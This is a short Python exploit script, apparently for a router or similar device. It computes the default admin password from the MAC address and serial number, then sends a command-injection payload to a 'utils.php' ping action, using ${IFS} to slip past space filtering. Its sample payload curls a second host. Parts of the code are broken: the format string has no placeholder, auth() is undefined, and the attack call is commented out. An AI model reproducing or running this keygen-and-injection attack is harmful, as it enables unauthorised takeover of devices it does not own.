42 lines
1005 B
Python
42 lines
1005 B
Python
import requests
|
|
import hashlib
|
|
import sys
|
|
|
|
def xorshift(x, y, z, w):
|
|
t = x
|
|
t = t ^ ((t << 11) & 0xFFFFFFFF)
|
|
t = t ^ (t >> 8)
|
|
x, y, z = y, z, w
|
|
w = (w ^ (w >> 19)) ^ t
|
|
return x, y, z, w, t
|
|
|
|
def keygen(mac, serial):
|
|
l = 20
|
|
password = ""
|
|
md5a = hashlib.md5(mac).hexdigest()
|
|
md5b = hashlib.md5(serial).hexdigest()
|
|
w = int(md5a[0:8], 16)
|
|
x = int(md5a[8:16], 16)
|
|
y = int(md5a[16:24], 16)
|
|
z = int(md5a[24:32], 16)
|
|
|
|
for i in range(0, l):
|
|
x, y, z, w, t = xorshift(x, y, z, w)
|
|
password += md5b[t % 20]
|
|
|
|
return password
|
|
|
|
def rce(username, password, host, payload):
|
|
requests.post("http://{}/utils.php".format(host), auth=auth(username, password), data={"action": "ping", "host": "127.0.0.1\n".format(payload.replace(' ', '${IFS}'))})
|
|
|
|
def main():
|
|
serial = sys.argv[1].encode("ascii")
|
|
mac = sys.argv[2].encode("ascii")
|
|
host = "192.168.77.1"
|
|
payload = "curl 192.168.77.10:8080"
|
|
password = keygen(mac, serial)
|
|
print(password)
|
|
#rce("admin", password, host, payload)
|
|
|
|
main()
|